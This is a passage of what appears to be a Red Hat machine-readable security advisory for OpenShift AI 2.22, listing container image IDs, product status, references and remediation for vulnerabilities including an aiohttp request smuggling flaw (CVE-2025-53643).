"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "database/sql: Postgres Scan Race Condition"
},
{
"cve": "CVE-2025-53643",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2025-07-14T21:00:57.122280+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2380000"
}
],
"notes": [
{
"category": "description",
"text": "A request smuggling flaw was found in the aiohttp python library. If a pure Python version of aiohttp is installed, without the usual C extensions, for example, or if AIOHTTP_NO_EXTENSIONS is enabled, an attacker can execute a request smuggling attack to bypass certain firewalls or proxy protections.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aiohttp: AIOHTTP HTTP Request/Response Smuggling",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-53643"
},
{
"category": "external",
"summary": "RHBZ#2380000",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380000"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-53643",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53643"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-53643",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53643"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a",
"url": "https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj"
}
],
"release_date": "2025-07-14T20:17:18.247000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
